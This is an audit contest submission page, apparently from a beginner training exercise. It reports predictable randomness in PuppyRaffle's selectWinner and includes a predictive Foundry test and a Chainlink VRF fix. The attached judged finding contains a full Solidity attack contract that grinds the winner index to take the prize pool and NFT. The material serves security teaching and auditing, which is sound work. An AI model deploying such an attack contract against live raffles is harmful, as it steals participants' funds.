Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

# Predictable (weak) randomness in `PuppyRaffle::selectWinner` lets an attacker choose the winner and the puppy rarity ##

yui1853

[H-2] Predictable (weak) randomness in `PuppyRaffle::selectWinner` lets an attacker choose the winner and the puppy rarity

Risk

Likelihood: High — selectWinner is permissionless and the seed is fully public and computable in advance; an attacker simply calls only when the result favors them.

Impact: High — The attacker reliably wins the prize pool (80% of all entrance fees) and can force a legendary NFT rarity, completely breaking the raffle's fairness for honest participants.

Severity: High (High likelihood × High impact).

Description

PuppyRaffle::selectWinner derives both the winner and the puppy rarity from on-chain values that are public and/or controllable at call time, so the result is not random — it can be computed in advance.

uint256 winnerIndex =

uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length; // @>

...

uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100; // @>

All three seed inputs are knowable before the transaction is mined:

msg.sender — chosen by the attacker (selectWinner has no access control, so anyone can call it from any address/contract).
block.timestamp / block.difficulty — known for the current block, and a validator can additionally manipulate them.

Because the formula is public and deterministic, an attacker can compute winnerIndex (and rarity) off-chain or inside a contract before calling, and only call selectWinner when the result favors them (reverting otherwise).

Impact

An attacker who has entered the raffle can guarantee that they win the prize pool (80% of all entrance fees) instead of leaving it to chance.
The attacker can also force a legendary rarity for the minted NFT.
The raffle's core fairness guarantee is broken; honest participants effectively cannot win against a motivated attacker.

Proof of Concept

The winner can be predicted before the draw using the exact same public formula. From test/WeakRandomnessPoC.t.sol:

4 players enter and the raffle period ends.
Before calling selectWinner, compute winnerIndex = keccak256(msg.sender, block.timestamp, block.difficulty) % players.length and read players(winnerIndex).
Call selectWinner; previousWinner equals the predicted address — every time.

uint256 predictedIndex =

uint256(keccak256(abi.encodePacked(address(this), block.timestamp, block.difficulty))) % 4;

address predictedWinner = puppyRaffle.players(predictedIndex);

puppyRaffle.selectWinner();

assertEq(puppyRaffle.previousWinner(), predictedWinner); // passes -> outcome is predictable, not random

A weaponized version is a contract that computes the would-be winnerIndex, and calls selectWinner only if it points to the attacker's own player slot (revert otherwise), retrying over blocks until it wins.

Recommended Mitigation

Do not derive randomness from on-chain values (msg.sender, block.timestamp, block.difficulty/prevrandao). Use a verifiable, manipulation-resistant randomness source such as Chainlink VRF, which delivers a random word that callers and validators cannot predict or grind. Split selectWinner into a two-step request/fulfil pattern: one transaction requests randomness, and the VRF coordinator returns it in a callback where the winner is finalised.

import {VRFConsumerBaseV2} from "@chainlink/contracts/src/v0.8/vrf/VRFConsumerBaseV2.sol";

import {VRFCoordinatorV2Interface} from "@chainlink/contracts/src/v0.8/interfaces/VRFCoordinatorV2Interface.sol";

// Step 1: anyone can request the draw once the raffle is over.

function requestWinner() external {

require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");

require(players.length >= 4, "PuppyRaffle: Need at least 4 players");

// Returns a requestId; the random value is delivered later by the VRF coordinator.

s_requestId = COORDINATOR.requestRandomWords(keyHash, s_subId, REQUEST_CONFIRMATIONS, CALLBACK_GAS_LIMIT, 1);

}

// Step 2: only the VRF coordinator can call this, with an unpredictable random word.

function fulfillRandomWords(uint256 /*requestId*/, uint256[] memory randomWords) internal override {

uint256 winnerIndex = randomWords[0] % players.length; // randomWords[0] cannot be predicted/ground

address winner = players[winnerIndex];

uint256 rarity = uint256(keccak256(abi.encode(randomWords[0], "rarity"))) % 100;

// ... assign rarity, reset raffle state, send prize, mint NFT (apply CEI here too) ...

}

Because randomWords[0] is produced off-chain by the VRF and verified on-chain, no participant (or validator) can compute the outcome in advance or selectively trigger a favourable draw.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 2 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!